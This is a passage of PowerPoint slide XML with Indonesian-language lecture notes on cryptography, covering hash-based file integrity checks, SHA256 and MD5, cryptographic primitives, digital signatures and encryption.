              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Alice. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipublikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di situs web, Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengasumsikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pertimbangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengganti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>unduhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbahaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Akan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>referensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghitung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cocok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuatnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>curiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ada dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Secure Hash Algorithm (SHA)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terkuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>varian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keluaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hasil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Varian yang paling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>populer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SHA256, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digest 256-bit.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Message Digest Algorithm #5 (MD5)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> digest 128-bit. MD5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> seaman SHA256, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mungkin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kompatibilitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18529618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Tanda Tangan Digital</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebuah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tunggal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>primitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lengkap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>primitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sifat-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sifat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/hash yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan cipher </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>khusus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>batasan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaannya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konteks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tujuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Sandi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyandikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
